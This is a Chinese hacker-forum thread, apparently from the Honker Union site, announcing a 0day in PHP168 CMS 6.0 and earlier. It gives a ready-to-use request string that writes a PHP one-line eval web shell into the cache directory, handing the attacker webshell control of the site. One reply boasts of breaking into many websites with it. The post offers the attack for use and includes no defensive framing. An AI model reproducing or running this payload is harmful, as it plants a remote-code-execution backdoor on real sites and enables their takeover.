返回列表 发帖

[原创] 红客联盟首发PHP168 6.0及以下版本0day

PHP168 6.0及以下版本漏洞

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。  
测试语句: XU3中国红客联盟-全球最大的红客组织

?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
1

评分人数

  • 超超

成功入侵了很多网站

TOP

新手 学习 谢谢分享

TOP

返回列表